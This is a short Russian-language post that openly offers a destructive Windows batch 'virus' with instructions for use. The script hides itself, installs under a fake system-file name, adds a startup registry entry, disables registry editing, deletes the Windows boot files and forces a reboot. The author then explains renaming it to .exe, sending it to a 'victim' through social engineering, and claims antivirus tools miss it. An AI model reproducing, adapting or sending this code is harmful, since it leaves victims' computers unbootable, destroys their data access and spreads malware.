Довольно не слабый вирус на "языке Windows" (Вариант 1)

Довольно не слабый вирус на "языке Windows" (Вариант 1)


Для начала открываем какой нибудь редактор кода, например, NotePad++, и вставляем туда этот код:

@echo off
title regserv
attrib 0% +h +s +a +r
copy ""%0"" "%SystemRoot%\system32\regsrv32.bat" >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "regsrv32" /t REG_SZ /d "%SystemRoot%\system\regsrv32.bat" /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
attrib C:\bootmgr -h -s -a -r /Если это ХР то ntldr
del c:\bootmgr >nul
attrib c:\IO.SYS -h -s -a -r
del c:\IO.SYS >nul
attrib C:\MSDOS.SYS -h -s -a -r
del C:\MSDOS.SYS
shutdown -r -t 1 -c "Good bye, LAMER" -f >nul  

И сохраняем с расширением .bat​

При помощи какой либо программы переделываем расширение на .exe, и методами СИ отправляем его нашей жертве, чтобы она его запустила.

Этот вирус стирает файлы bootmgr(ntldr), IO.SYS, MS-DOS.SYS, и добавляется в автозагрузку и антивирями не палится. Жертва запускает вирус, он стирает файлы загрузки Винды, добавляется в автозагрузку, перегружает комп. В последствии винда грузиться не будет. Поможет только какой-то загрузочный диск или переустановка винды. Даже если жертва и найдет эти файлы где-то и вставит их обратно, не почистив реестра, то всё пойдёт по старому кругу.​


Всем удачи 😉

Ваш developer

Report Page